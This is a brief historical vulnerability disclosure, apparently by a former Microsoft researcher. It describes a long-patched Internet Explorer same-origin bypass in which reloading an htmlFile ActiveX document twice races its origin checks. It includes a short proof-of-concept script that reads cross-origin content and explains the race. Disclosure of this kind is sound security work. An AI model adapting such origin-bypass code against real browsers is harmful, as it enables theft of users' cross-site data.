The htmlFile ActiveX object creates a hidden in-process HTML document. By having an IFrame write to it, reloading it twice in quick succession, and then reading its body, I was able to access content from a cross-origin context.

axDoc = new ActiveXObject("htmlFile");
window[0].execScript("top.axDoc.write(1); top.axDoc.close();");
axDoc.parentWindow.location.reload();
setTimeout("axDoc.parentWindow.location.reload();", 200);
// After second reload:
alert(axDoc.body.innerText); // Cross-origin read

The double reload created a race condition in the document’s origin tracking. After the first reload, the htmlFile document’s security context was in a transitional state; the second reload while in that state caused the origin checks to be bypassed, leaving the document’s content readable from the attacker page.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.